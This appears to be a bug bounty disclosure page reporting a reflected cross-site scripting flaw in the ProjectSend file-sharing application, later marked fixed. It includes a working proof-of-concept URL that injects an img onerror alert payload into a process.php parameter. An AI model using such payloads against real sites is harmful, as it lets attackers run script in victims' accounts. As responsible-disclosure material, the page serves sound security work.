We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-site Scripting (XSS) - Reflected in projectsend/projectsend

Valid

Reported on

Jul 2nd 2021

💥 BUG

reflected xss

💥 STEP TO REPRODUCE

1. Login to your account and visit url http://localhost/projectsend2/process.php?do=return_files_ids&files%5B0%5D%5Bname%5D=batch%5B%5D&files%5B0%5D%5Bvalue%5D=32%27%22%3E%3Cimg+src=x+onerror=alert()%3E and see xss is executed

💥 IMPACT

Attacker can execute arbitary javascript in victim account using this xss

We have contacted a member of the projectsend team and are waiting to hear back 2 years ago
ranjit-git submitted a
patch
2 years ago
Ignacio Nelson marked this as fixed with commit 0a30d0 2 years ago
ranjit-git has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation